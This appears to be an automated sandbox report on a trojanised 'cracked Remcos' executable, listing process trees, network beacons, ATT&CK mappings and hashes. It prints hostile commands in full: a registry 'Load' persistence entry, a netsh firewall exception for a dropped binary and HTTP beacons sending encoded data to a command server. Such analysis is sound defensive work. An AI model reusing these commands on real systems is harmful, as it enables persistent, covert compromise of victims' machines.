Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 1636 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1636 AUDIODG.EXE Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe Token: 33 3212 taskhost.exe Token: SeIncBasePriorityPrivilege 3212 taskhost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3252 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4680 remcos_agent.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4680 remcos_agent.exe 4680 remcos_agent.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3252 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4680 remcos_agent.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3252 Remcos Professional Cracked By Alcatraz3222.exe 3252 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 4572 Remcos Professional Cracked By Alcatraz3222.exe 1616 dxdiag.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 4952 wrote to memory of 3252 4952 Remcos Professional Cracked By Alcatraz3222.exe 80 PID 4952 wrote to memory of 3252 4952 Remcos Professional Cracked By Alcatraz3222.exe 80 PID 4952 wrote to memory of 3252 4952 Remcos Professional Cracked By Alcatraz3222.exe 80 PID 4952 wrote to memory of 1752 4952 Remcos Professional Cracked By Alcatraz3222.exe 81 PID 4952 wrote to memory of 1752 4952 Remcos Professional Cracked By Alcatraz3222.exe 81 PID 4952 wrote to memory of 1752 4952 Remcos Professional Cracked By Alcatraz3222.exe 81 PID 4952 wrote to memory of 3080 4952 Remcos Professional Cracked By Alcatraz3222.exe 83 PID 4952 wrote to memory of 3080 4952 Remcos Professional Cracked By Alcatraz3222.exe 83 PID 4952 wrote to memory of 3080 4952 Remcos Professional Cracked By Alcatraz3222.exe 83 PID 3080 wrote to memory of 2820 3080 cmd.exe 85 PID 3080 wrote to memory of 2820 3080 cmd.exe 85 PID 3080 wrote to memory of 2820 3080 cmd.exe 85 PID 4952 wrote to memory of 3688 4952 Remcos Professional Cracked By Alcatraz3222.exe 86 PID 4952 wrote to memory of 3688 4952 Remcos Professional Cracked By Alcatraz3222.exe 86 PID 4952 wrote to memory of 3688 4952 Remcos Professional Cracked By Alcatraz3222.exe 86 PID 4952 wrote to memory of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 PID 4952 wrote to memory of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 PID 4952 wrote to memory of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 PID 4952 wrote to memory of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 PID 4952 wrote to memory of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 PID 4952 wrote to memory of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 PID 4952 wrote to memory of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 PID 4952 wrote to memory of 3212 4952 Remcos Professional Cracked By Alcatraz3222.exe 88 PID 3212 wrote to memory of 3864 3212 taskhost.exe 89 PID 3212 wrote to memory of 3864 3212 taskhost.exe 89 PID 3212 wrote to memory of 3864 3212 taskhost.exe 89 PID 4680 wrote to memory of 1616 4680 remcos_agent.exe 110 PID 4680 wrote to memory of 1616 4680 remcos_agent.exe 110 PID 4680 wrote to memory of 1616 4680 remcos_agent.exe 110 PID 4680 wrote to memory of 4716 4680 remcos_agent.exe 113 PID 4680 wrote to memory of 4716 4680 remcos_agent.exe 113 PID 4680 wrote to memory of 4716 4680 remcos_agent.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222\Remcos Professional Cracked By Alcatraz3222.exe"C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222\Remcos Professional Cracked By Alcatraz3222.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe"C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3252
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "C:/Users/Admin/AppData/Local/Temp/Remcos Professional Cracked By Alcatraz3222/Remcos Professional Cracked By Alcatraz3222.exe" "%temp%\Profile Remcos\Update_Lock_Remcos.exe" /Y2⤵
- System Location Discovery: System Language Discovery
PID:1752
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%temp%\Profile Remcos\Update_Lock_Remcos.exe.lnk" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Profile Remcos\Update_Lock_Remcos.exe.lnk" /f3⤵
- System Location Discovery: System Language Discovery
PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo [zoneTransfer]ZoneID = 2 > %temp%\Profile Remcos\Update_Lock_Remcos.exe:Zone.Identifier2⤵
- System Location Discovery: System Language Discovery
PID:3688
-
-
C:\Users\Admin\AppData\Local\Temp\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\taskhost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\taskhost.exe" "taskhost.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3864
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1172
-
C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe"C:\Users\Admin\AppData\Local\Temp\Remcos Professional Cracked By Alcatraz3222.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4572
-
C:\Users\Admin\Desktop\remcos_agent.exe"C:\Users\Admin\Desktop\remcos_agent.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\dxdiag.exe"C:\Windows\System32\dxdiag.exe" /t C:\Users\Admin\AppData\Local\Temp\sysinfo.txt2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1616
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\uninstall.vbs"2⤵
- System Location Discovery: System Language Discovery
PID:4716
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4ac 0x32c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
Network
-
Remote address:8.8.8.8:53Requestbreakingsec02.co.nfIN AResponsebreakingsec02.co.nfIN CNAME91498.bodis.com91498.bodis.comIN A199.59.243.228
-
GEThttp://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53Remcos Professional Cracked By Alcatraz3222.exeRemote address:199.59.243.228:80RequestGET /Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53 HTTP/1.1
User-Agent: REMCOS
Host: breakingsec02.co.nf
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1310
x-request-id: 6db63d02-8ae4-4556-b338-e1a97b76d62d
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OCJLnlCnnm9Z2QfXZafji9TuGsNddj5776lO8Pt0jCVgJS9dZEaKQrofNwYprbMHhp4v21TMIrzaFR1DIQ2D9A==
set-cookie: parking_session=6db63d02-8ae4-4556-b338-e1a97b76d62d; expires=Fri, 21 Feb 2025 17:51:34 GMT; path=/
-
Remote address:199.59.243.228:80RequestGET /Remcos/upd_free.txt HTTP/1.1
User-Agent: REMCOS
Host: breakingsec02.co.nf
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1086
x-request-id: a63f3675-8e77-480f-a271-ea8c867ee142
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Q9tWON6xJOhM/gmfLyztOYqHCXUUH02QeHHTvshYw/jwYIOjvFAmWfVR32l39xkIwPjNLjgAujOhOAKSmmRWmg==
set-cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142; expires=Fri, 21 Feb 2025 17:51:34 GMT; path=/
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN A
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN A
-
GEThttp://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6164536461647364406465657A2E636F6D0A0A53Remcos Professional Cracked By Alcatraz3222.exeRemote address:199.59.243.228:80RequestGET /Remcos/logaccess.php?DATA=322E322E30204C696768740A6164536461647364406465657A2E636F6D0A0A53 HTTP/1.1
User-Agent: REMCOS
Host: breakingsec02.co.nf
Cache-Control: no-cache
Cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1278
x-request-id: 40a736f6-2089-4aa6-9b21-0f381e82a024
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCKBgQsz/sDNzDvHMFQPC2FM2a9XOIuJ4iFvdnemSflIZwlsy/MdHlNISvcKCNnJGGLP6dEujbqGxhLvzWGEVw==
set-cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142; expires=Fri, 21 Feb 2025 17:53:07 GMT
-
Remote address:199.59.243.228:80RequestGET /Remcos/upd_free.txt HTTP/1.1
User-Agent: REMCOS
Host: breakingsec02.co.nf
Cache-Control: no-cache
Cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1086
x-request-id: e0727444-5ecc-48d5-916e-a79094d2c033
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Q9tWON6xJOhM/gmfLyztOYqHCXUUH02QeHHTvshYw/jwYIOjvFAmWfVR32l39xkIwPjNLjgAujOhOAKSmmRWmg==
set-cookie: parking_session=a63f3675-8e77-480f-a271-ea8c867ee142; expires=Fri, 21 Feb 2025 17:53:07 GMT
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestwww.geoplugin.netIN AResponsewww.geoplugin.netIN CNAMEgeoplugin.netgeoplugin.netIN A178.237.33.50
-
Remote address:178.237.33.50:80ResponseHTTP/1.1 400 Bad request
cache-control: no-cache
content-type: text/html
connection: close
-
Remote address:178.237.33.50:80RequestGET /json.gp?ip=127.0.0.1 HTTP/1.1
Host: www.geoplugin.net
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
server: Apache
content-length: 894
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
-
Remote address:8.8.8.8:53Requestfd.api.iris.microsoft.comIN AResponsefd.api.iris.microsoft.comIN CNAMEfd-api-iris.trafficmanager.netfd-api-iris.trafficmanager.netIN CNAMEiris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.comiris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.comIN A20.223.35.26
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN A
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN A
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponse
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
Remote address:8.8.8.8:53Requestdllsys.duckdns.orgIN AResponsedllsys.duckdns.orgIN A84.220.8.178
-
199.59.243.228:80http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53httpRemcos Professional Cracked By Alcatraz3222.exe612 B 3.0kB 9 6
HTTP Request
GET http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6E756C6C65746865626561737440676D61696C2E636F6D0A0A53HTTP Response
200 -
199.59.243.228:80http://breakingsec02.co.nf/Remcos/upd_free.txthttpRemcos Professional Cracked By Alcatraz3222.exe523 B 2.6kB 9 6
HTTP Request
GET http://breakingsec02.co.nf/Remcos/upd_free.txtHTTP Response
200 -
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
199.59.243.228:80http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6164536461647364406465657A2E636F6D0A0A53httpRemcos Professional Cracked By Alcatraz3222.exe714 B 2.9kB 10 5
HTTP Request
GET http://breakingsec02.co.nf/Remcos/logaccess.php?DATA=322E322E30204C696768740A6164536461647364406465657A2E636F6D0A0A53HTTP Response
200 -
199.59.243.228:80http://breakingsec02.co.nf/Remcos/upd_free.txthttpRemcos Professional Cracked By Alcatraz3222.exe643 B 2.5kB 10 5
HTTP Request
GET http://breakingsec02.co.nf/Remcos/upd_free.txtHTTP Response
200 -
260 B 5
-
260 B 5
-
236 B 339 B 5 3
HTTP Response
400 -
178.237.33.50:80http://www.geoplugin.net/json.gp?ip=127.0.0.1httpRemcos Professional Cracked By Alcatraz3222.exe410 B 1.3kB 7 4
HTTP Request
GET http://www.geoplugin.net/json.gp?ip=127.0.0.1HTTP Response
200 -
-
260 B 5
-
-
260 B 5
-
260 B 5
-
98 B 52 B 2 1
-
-
260 B 5
-
-
260 B 5
-
260 B 5
-
-
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
65 B 110 B 1 1
DNS Request
breakingsec02.co.nf
DNS Response
199.59.243.228
-
192 B 208 B 3 3
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
-
192 B 80 B 3 1
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
-
128 B 160 B 2 2
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
DNS Response
84.220.8.178
-
63 B 93 B 1 1
DNS Request
www.geoplugin.net
DNS Response
178.237.33.50
-
71 B 197 B 1 1
DNS Request
fd.api.iris.microsoft.com
DNS Response
20.223.35.26
-
192 B 144 B 3 2
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
-
192 B 224 B 3 3
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
DNS Response
84.220.8.178
-
128 B 144 B 2 2
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
-
256 B 272 B 4 4
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
-
64 B 80 B 1 1
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
-
64 B 80 B 1 1
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
-
256 B 256 B 4 4
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
-
128 B 160 B 2 2
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
DNS Response
84.220.8.178
-
128 B 160 B 2 2
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
DNS Response
84.220.8.178
-
128 B 80 B 2 1
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
-
192 B 224 B 3 3
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
DNS Response
84.220.8.178
-
192 B 240 B 3 3
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Request
dllsys.duckdns.org
DNS Response
84.220.8.178
DNS Response
84.220.8.178
DNS Response
84.220.8.178
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD531e5aec17c9fb39143e7b4541a061832
SHA133826c5f5e7d5c0c08168c99d336631c34f888d2
SHA256addbc9995756aa52374fe1c25f55cafeaa25db89476fad039c6afcc55392f554
SHA5123fe92e984b6301fb257b542bce6efee1296630429736140537c5e0598ff1b3009e3c589d6f62d9727969cd80715bcdba75de23c16f2db991c20f26b05386c273
-
Filesize
368B
MD512f205a89a4d82d9ae723a1c1544dfe7
SHA1e585ca1a71ea5f76972b397948596a0297394279
SHA256ce2f9bb0f8b7bf18d6a40ea6afaeca04c66b1c9636b503a4f4eee99003c03901
SHA5120977a7cf7048af957f4ff482ded220d0dbe6a80e26aeebbf527f36c3c5bedd9dc69399a74c70bfd51989d1b732cacc294e1e6d108e450803ba29c62351c53d1f
-
Filesize
413B
MD55b9a62933c33daa4abda08df04bf3aa8
SHA14965b450da81f85747259d4641c051737544212c
SHA256a3baa083b94ed441878ae15367a9502f2e8c9f1fa62af5a36f89fae03391679f
SHA5124a216f518741f5d4545908c5a32461255ffd874713105aedcc244da76f85ef039d7ddaa29b482abe0e80782dc86b429bb4096cd2c56402cfc140a938ad7c4046
-
Filesize
17.4MB
MD5c3c21fa4c2186deb641455482ab0d3aa
SHA12f4b49e8383e073ccb965943ce970de403412567
SHA2564ea203509d0fdff3e31f976413c546ca3d36133bc708e9a1301860961cc3a8d9
SHA51231db2963f1bd49f7b4a6ee38e54940d20120d6c05ef7bf34ec97eb93051bee6d5428e9e1271e4ae8f5544b824188ac7278315e2e2c27be302a312eebbf8c3fb7
-
Filesize
881B
MD5a3468935e33e361cf94f4721ed4cb66d
SHA1c3b19ca8382534b2179940cabede8c6c952a9c06
SHA256b374af58c24b6085f64f979dab434643da39d0267a27975f396473327dc98c7d
SHA512c1caa0b9637a46187d54b2952db204182fad5a5324574949ce4db13bdb17624ccd8b3228eb9b2bcfe5851add2c5d2f586945e7264b1d1cd02d91acf1fd81583a
-
Filesize
82B
MD595f6852f90f90842cb66c0ee6529fcb3
SHA1beb85551bba15b8777cf05b825e38056391336d5
SHA256df27d865a102b728c7308d0e4d6b7ff4a6040a11da882da6ab0f2f1c463bdec6
SHA51262bd0df98699eab40bc79ebc38d3b40caef1099c7d0607af54e7df90e7a721091d8f46fa0fdd4bee1894588cf25200d2cf947afcc1c56a79fc259aa4286d76ae
-
Filesize
84KB
MD54eddddfa90e4476f37f8831dfefb45cc
SHA11e3b5c6e61c0e93cfb5afc9d54f497904b76083b
